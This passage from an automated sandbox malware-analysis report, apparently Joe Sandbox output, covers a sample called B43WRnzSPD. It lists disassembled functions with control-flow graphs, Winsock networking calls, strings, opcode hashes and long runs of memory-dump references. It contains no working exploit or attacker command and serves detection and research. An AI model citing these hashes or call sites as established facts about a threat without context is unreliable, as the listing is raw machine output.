                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                  • API String ID: 98920635-842387772
                                                  • Opcode ID: 41dbd60bab4c83a67e0191a64a37cbd1020a6d7d614ae7e26f190e31921b0227
                                                  • Instruction ID: c9f3b86533a45b213a1b27eb2a9584e441df3cef5abf8623663925179490dfcc
                                                  • Opcode Fuzzy Hash: 41dbd60bab4c83a67e0191a64a37cbd1020a6d7d614ae7e26f190e31921b0227
                                                  • Instruction Fuzzy Hash: D9114876E5035177D6206B696C1BF8B3B99EFD2734F080559F814A33E2D222E8A0C2E1
                                                  Function 0063A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1773 63a150-63a159 1774 63a250 1773->1774 1775 63a15f-63a17b 1773->1775 1776 63a181-63a1ce getsockname 1775->1776 1777 63a249-63a24f 1775->1777 1778 63a1d0-63a1f5 call 61d090 1776->1778 1779 63a1f7-63a214 call 63ef30 1776->1779 1777->1774 1787 63a240-63a246 call 644f40 1778->1787 1779->1777 1783 63a216-63a23b call 61d090 1779->1783 1783->1787 1787->1777
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 0063A1C6
                                                  Strings
                                                  • getsockname() failed with errno %d: %s, xrefs: 0063A1F0
                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0063A23B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3358416759-2605427207
                                                  • Opcode ID: 5b0d560ba2c669b6bdd35efcde55c98eb274211dda910807c059b414ab695dfe
                                                  • Instruction ID: c374222e96be97241a9ddf0fa8af5550013a265773553e7fec45ee8c1cf4d0ad
                                                  • Opcode Fuzzy Hash: 5b0d560ba2c669b6bdd35efcde55c98eb274211dda910807c059b414ab695dfe
                                                  • Instruction Fuzzy Hash: 22210A31808680AAF7259B58DC42FE7B3BCEF91324F040618F99853151FB32598687E3
                                                  Function 0061D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1793 61d5e0-61d5ee 1794 61d5f0-61d604 call 61d690 1793->1794 1795 61d652-61d662 WSAStartup 1793->1795 1801 61d606-61d614 1794->1801 1802 61d61b-61d651 call 627620 1794->1802 1796 61d670-61d676 1795->1796 1797 61d664-61d66f 1795->1797 1796->1794 1799 61d67c-61d68d 1796->1799 1801->1802 1807 61d616 1801->1807 1807->1802
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202), ref: 0061D65B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID: if_nametoindex$iphlpapi.dll
                                                  • API String ID: 724789610-3097795196
                                                  • Opcode ID: 9e89adbb3af0aaa89c4dcec2695f532f3542f7ae8cd5e042e8e5d2f10d7dec99
                                                  • Instruction ID: 7d2e6785b6ef4bc6d84dd50ed4e976d911851450bbf8840a49ee894a19711a8b
                                                  • Opcode Fuzzy Hash: 9e89adbb3af0aaa89c4dcec2695f532f3542f7ae8cd5e042e8e5d2f10d7dec99
                                                  • Instruction Fuzzy Hash: 2F0126D0A403C117F721AB38AE177E636D19B71304F481969A848C63E3FA39C4CAC2A2
                                                  Function 006CAA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1809 6caa30-6caa64 1811 6caa6a-6caaa7 call 6be730 1809->1811 1812 6cab04-6cab09 1809->1812 1816 6cab0e-6cab13 1811->1816 1817 6caaa9-6caabd 1811->1817 1814 6cae80-6cae89 1812->1814 1820 6cae2e 1816->1820 1818 6caabf-6caac7 1817->1818 1819 6cab18-6cab50 1817->1819 1818->1820 1822 6caacd-6cab02 1818->1822 1825 6cab58-6cab6d 1819->1825 1821 6cae30-6cae4a call 6bea60 call 6bebf0 1820->1821 1834 6cae4c-6cae57 1821->1834 1835 6cae75-6cae7d 1821->1835 1822->1825 1828 6cab6f-6cab73 1825->1828 1829 6cab96-6cabab socket 1825->1829 1828->1829 1831 6cab75-6cab8f 1828->1831 1829->1820 1833 6cabb1-6cabc5 1829->1833 1831->1833 1847 6cab91 1831->1847 1836 6cabc7-6cabca 1833->1836 1837 6cabd0-6cabed ioctlsocket 1833->1837 1839 6cae6e-6cae74 1834->1839 1840 6cae59-6cae5e 1834->1840 1835->1814 1836->1837 1841 6cad2e-6cad39 1836->1841 1842 6cabef-6cac0a 1837->1842 1843 6cac10-6cac14 1837->1843 1839->1835 1840->1839 1850 6cae60-6cae6c 1840->1850 1848 6cad3b-6cad4c 1841->1848 1849 6cad52-6cad56 1841->1849 1842->1843 1854 6cae29 1842->1854 1844 6cac16-6cac31 1843->1844 1845 6cac37-6cac41 1843->1845 1844->1845 1844->1854 1851 6cac7a-6cac7e 1845->1851 1852 6cac43-6cac46 1845->1852 1847->1820 1848->1849 1848->1854 1853 6cad5c-6cad6b 1849->1853 1849->1854 1850->1835 1861 6cace7-6cacfe 1851->1861 1862 6cac80-6cac9b 1851->1862 1858 6cac4c-6cac51 1852->1858 1859 6cad04-6cad08 1852->1859 1863 6cad70-6cad78 1853->1863 1854->1820 1858->1859 1866 6cac57-6cac78 1858->1866 1859->1841 1865 6cad0a-6cad28 1859->1865 1861->1859 1862->1861 1867 6cac9d-6cacc1 1862->1867 1868 6cad7a-6cad7f 1863->1868 1869 6cada0-6cadb2 connect 1863->1869 1865->1841 1865->1854 1871 6cacc6-6cacd7 1866->1871 1867->1871 1868->1869 1872 6cad81-6cad99 1868->1872 1870 6cadb3-6cadcf 1869->1870 1878 6cae8a-6cae91 1870->1878 1879 6cadd5-6cadd8 1870->1879 1871->1854 1880 6cacdd-6cace5 1871->1880 1872->1870 1878->1821 1881 6cadda-6caddf 1879->1881 1882 6cade1-6cadf1 1879->1882 1880->1859 1880->1861 1881->1863 1881->1882 1883 6cae0d-6cae12 1882->1883 1884 6cadf3-6cae07 1882->1884 1885 6cae1a-6cae1c call 6caf70 1883->1885 1886 6cae14-6cae17 1883->1886 1884->1883 1889 6caea8-6caead 1884->1889 1890 6cae21-6cae23 1885->1890 1886->1885 1889->1821 1891 6cae25-6cae27 1890->1891 1892 6cae93-6cae9d 1890->1892 1891->1821 1893 6caeaf-6caeb1 call 6be760 1892->1893 1894 6cae9f-6caea6 call 6be7c0 1892->1894 1898 6caeb6-6caebe 1893->1898 1894->1898 1899 6caf1a-6caf1f 1898->1899 1900 6caec0-6caedb call 6be180 1898->1900 1899->1821 1900->1821 1903 6caee1-6caeec 1900->1903 1904 6caeee-6caeff 1903->1904 1905 6caf02-6caf06 1903->1905 1904->1905 1906 6caf0e-6caf15 1905->1906 1907 6caf08-6caf0b 1905->1907 1906->1814 1907->1906
                                                  APIs
                                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 006CAB9B
                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 006CABE3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: ioctlsocketsocket
                                                  • String ID:
                                                  • API String ID: 416004797-0
                                                  • Opcode ID: 279bdfb1b53586e317d65d601dc24ddeacb2e29e75826fe2ddfd8bc8a80dc052
                                                  • Instruction ID: c69db896c01f8e37ac178ba95e46b579cc122112e72296aad95c7712c17ba140
                                                  • Opcode Fuzzy Hash: 279bdfb1b53586e317d65d601dc24ddeacb2e29e75826fe2ddfd8bc8a80dc052
                                                  • Instruction Fuzzy Hash: D2E1C1706003069BE720CFA4C884FBA77E6EF89318F144A2DF9998B391D775D845DB92
                                                  Function 006078B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID: FD %s:%d sclose(%d)
                                                  • API String ID: 2781271927-3116021458
                                                  • Opcode ID: 01df956450a41b2e9a25467c46a4aae925c71c733a8cfb91cc4b8604525a56ca
                                                  • Instruction ID: bdec78aa1abb2ed51735e778773c1d62acd8e0f94febccb69737bc9ba11fa549
                                                  • Opcode Fuzzy Hash: 01df956450a41b2e9a25467c46a4aae925c71c733a8cfb91cc4b8604525a56ca
                                                  • Instruction Fuzzy Hash: 26D05E32A4A2206B85206598AC44C9B7BA99EC6F60B09095DF98077250D230AD1183F3
                                                  Function 006CB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,006CB29E,?,00000000,?,?), ref: 006CB0B9
                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,006B3C41,00000000), ref: 006CB0C1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastconnect
                                                  • String ID:
                                                  • API String ID: 374722065-0
                                                  • Opcode ID: e41239bce0cf2258cff67ca5945789d2321dc98f1abe51d91cb5dc7abc53636f
                                                  • Instruction ID: b13439e5ce5dd7042108ef36d86c12e7f0a0b46486457edc1a7d0dbf931a1ae6
                                                  • Opcode Fuzzy Hash: e41239bce0cf2258cff67ca5945789d2321dc98f1abe51d91cb5dc7abc53636f
                                                  • Instruction Fuzzy Hash: 2A01D8323042005BCA205A78D844FBBB79AFF89374F040718F978932E1D726ED518761
                                                  Function 006B4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • gethostname.WS2_32(00000000,00000040), ref: 006B4AA4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: gethostname
                                                  • String ID:
                                                  • API String ID: 144339138-0
                                                  • Opcode ID: c90c686c0ef8103251046f5ff802f28b662f18255ac5d003d76477c2d2aacc8a
                                                  • Instruction ID: 6f3c5c043cf812ab50cc12edb008d81cb87ec1bd65247615e1f237a379a5b47a
                                                  • Opcode Fuzzy Hash: c90c686c0ef8103251046f5ff802f28b662f18255ac5d003d76477c2d2aacc8a
                                                  • Instruction Fuzzy Hash: F3518CF06047009BEB30AB29D9497E376E6AF41315F14183CEA8A867D2EF75E8C4C716
                                                  Function 006CAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • getsockname.WS2_32(?,?,00000080), ref: 006CAFD1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID:
                                                  • API String ID: 3358416759-0
                                                  • Opcode ID: 9d270ff2f7af3a23b381359dc754ee6472b7568f1785ac6cf6a10be593675e09
                                                  • Instruction ID: 8e5e6c83f7eabaf78f3dd82705a7795f969874152ced8b4f857715e71a40da79
                                                  • Opcode Fuzzy Hash: 9d270ff2f7af3a23b381359dc754ee6472b7568f1785ac6cf6a10be593675e09
                                                  • Instruction Fuzzy Hash: 3B11D67080878495EB268F18D402BF6B3F4EFD0328F10961DE59942150F7329AC68BC2
                                                  Function 006CA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 006CA97F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000EB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019619568.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019942532.00000000010B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020085005.0000000001269000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2020114196.000000000126B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_600000_B43WRnzSPD.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: 815d6e5464d83e75ae19e7c022f9b15d96c3885bd59dc3f5243a0b237c748314
                                                  • Instruction ID: b5700f1a869e940dfd117c22ff52e923de61240ec0437568e13bca1ed86a231f
                                                  • Opcode Fuzzy Hash: 815d6e5464d83e75ae19e7c022f9b15d96c3885bd59dc3f5243a0b237c748314
                                                  • Instruction Fuzzy Hash: 0401A272B10714AFC6148F64D885FA6B7A5EF84720F06865DFA986B361C331BC108BE1
                                                  Function 006CAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(?,006CB280,00000000,-00000001,00000000,006CB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 006CAF67
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2019104337.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                  • Associated: 00000001.00000002.2019027659.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019104337.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.2019597103.0000000000D2A000.00000004.00000001.01000000.00000003.sdmpDownload File
